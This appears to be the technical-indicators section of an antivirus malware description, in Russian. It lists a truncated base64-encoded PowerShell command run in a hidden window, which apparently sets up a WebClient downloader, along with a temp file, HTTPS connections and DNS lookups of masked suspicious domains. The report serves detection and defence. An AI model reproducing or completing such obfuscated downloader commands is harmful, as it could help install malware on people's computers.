Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAEEAUQBRAHcAYwA9ACgAJwB3AEEAVQAnACsAJwAxAEEAQQAnACkAOwAkAEgANABVAEEAWgBBAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABYADQAQQBHAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\1373214.cvr
- 'mq####thcare.com':443
- 'mq####thcare.com':443
- DNS ASK pa#######lidingdoorrepair.com
- DNS ASK ih###tflix.com
- DNS ASK mq####thcare.com
- DNS ASK oy####nismanlik.net
- DNS ASK qc##sf.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAEEAUQBRAHcAYwA9ACgAJwB3AEEAVQAnACsAJwAxAEEAQQAnACkAOwAkAEgANABVAEEAWgBBAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABYADQAQQBHAE...' (со скрытым окном)